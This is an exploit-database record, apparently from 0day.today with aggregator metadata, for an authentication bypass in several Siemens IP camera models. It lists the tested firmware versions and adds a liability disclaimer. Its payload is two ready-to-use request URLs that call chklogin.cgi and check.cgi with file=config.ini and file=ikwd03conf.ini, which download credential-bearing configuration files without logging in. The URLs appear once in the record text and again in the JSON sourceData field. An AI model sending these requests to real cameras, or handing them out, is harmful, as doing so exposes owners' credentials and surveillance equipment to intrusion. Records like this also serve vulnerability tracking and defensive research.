ID 1337DAY-ID-25275 Type zdt Reporter Todor Donev Modified 2016-08-19T00:00:00
Description
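Exploit for the CGI platform, in the web applications category. Per the record title, it concerns credential disclosure / configuration download on multiple SIEMENS IP camera models. No CVE is listed, and the CVSS score of 0.0 with vector NONE appears to mean the entry is unscored, not that it was assessed as harmless.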
#
#
# Multiple SIEMENS IP Cameras: authentication bypass allowing configuration download
#
# Tested:
# SIEMENS IP Camera CCID1410-ST X.1.0.24
# SIEMENS IP Camera CCMW1025 x.2.2.1798
# SIEMENS IP Camera CCMS2025 x.2.2.1798
# SIEMENS IP Camera CVMS2025-IR x.2.2.1798
# SIEMENS IP Camera CVMS2025-IR CxMS2025_V2458
# SIEMENS IP Camera CVMS2025-IR CxMS2025_V2458_SP1
# SIEMENS IP Camera CCPW5025-IR CCPWx025_V0.1.58
#
# ...and more devices that use the same firmware
#
# Copyright 2016 (c) Todor Donev <todor.donev at gmail.com>
# http://www.ethical-hacker.org/
# https://www.facebook.com/ethicalhackerorg
#
# Disclaimer:
# This or any previous program is for educational
# purposes ONLY. Do not use it without permission.
# The usual disclaimer applies, especially the
# fact that Todor Donev is not liable for any
# damages caused by direct or indirect use of the
# information or functionality provided by these
# programs. The author or any Internet provider
# bears NO responsibility for content or misuse
# of these programs or any derivatives thereof.
# By using these programs you accept the fact
# that any damage (dataloss, system crash,
# system compromise, etc.) caused by the use
# of these programs is not Todor Donev's
# responsibility.
#
# Use them at your own risk!
#
#
http://TARGET/cgi-bin/chklogin.cgi?file=config.ini
http://TARGET/cgi-bin/check.cgi?file=ikwd03conf.ini
# 0day.today [2018-03-14] #
{"id": "1337DAY-ID-25275", "lastseen": "2018-03-14T06:40:09", "viewCount": 11, "bulletinFamily": "exploit", "cvss": {"score": 0.0, "vector": "NONE"}, "edition": 2, "enchantments": {"score": {"value": -0.4, "vector": "NONE", "modified": "2018-03-14T06:40:09", "rev": 2}, "dependencies": {"references": [{"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/BROWSER/CRYSTAL_REPORTS_PRINTCONTROL", "MSF:EXPLOIT/UNIX/WEBAPP/MITEL_AWC_EXEC", "MSF:EXPLOIT/WINDOWS/FILEFORMAT/XION_M3U_SEHBOF", "MSF:EXPLOIT/LINUX/HTTP/DLINK_HNAP_LOGIN_BOF"]}], "modified": "2018-03-14T06:40:09", "rev": 2}, "vulnersScore": -0.4}, "type": "zdt", "sourceHref": "https://0day.today/exploit/25275", "description": "Exploit for cgi platform in category web applications", "title": "SIEMENS IP Cameras (Multiple Models) - Credential Disclosure / Configuration Download", "cvelist": [], "sourceData": "# \r\n#\r\n# Multiple SIEMENS IP Cameras auth bypass configuration download\r\n#\r\n# Tested: \r\n# SIEMENS IP Camera CCID1410-ST X.1.0.24\r\n# SIEMENS IP Camera CCMW1025 x.2.2.1798\r\n# SIEMENS IP Camera CCMS2025 x.2.2.1798\r\n# SIEMENS IP Camera CVMS2025-IR x.2.2.1798\r\n# SIEMENS IP Camera CVMS2025-IR CxMS2025_V2458\r\n# SIEMENS IP Camera CVMS2025-IR CxMS2025_V2458_SP1\r\n# SIEMENS IP Camera CCPW5025-IR CCPWx025_V0.1.58\r\n# \r\n# ...and more, more devices who use same firmware\r\n#\r\n# Copyright 2016 (c) Todor Donev <todor.donev at gmail.com>\r\n# http://www.ethical-hacker.org/\r\n# https://www.facebook.com/ethicalhackerorg\r\n# \r\n# Disclaimer:\r\n# This or previous programs is for Educational\r\n# purpose ONLY. Do not use it without permission.\r\n# The usual disclaimer applies, especially the\r\n# fact that Todor Donev is not liable for any\r\n# damages caused by direct or indirect use of the\r\n# information or functionality provided by these\r\n# programs. 
The author or any Internet provider\r\n# bears NO responsibility for content or misuse\r\n# of these programs or any derivatives thereof.\r\n# By using these programs you accept the fact\r\n# that any damage (dataloss, system crash,\r\n# system compromise, etc.) caused by the use\r\n# of these programs is not Todor Donev's\r\n# responsibility.\r\n# \r\n# Use them at your own risk!\r\n#\r\n# \r\n \r\nhttp://TARGET/cgi-bin/chklogin.cgi?file=config.ini\r\nhttp://TARGET/cgi-bin/check.cgi?file=ikwd03conf.ini\n\n# 0day.today [2018-03-14] #", "published": "2016-08-19T00:00:00", "references": [], "reporter": "Todor Donev", "modified": "2016-08-19T00:00:00", "href": "https://0day.today/exploit/description/25275"}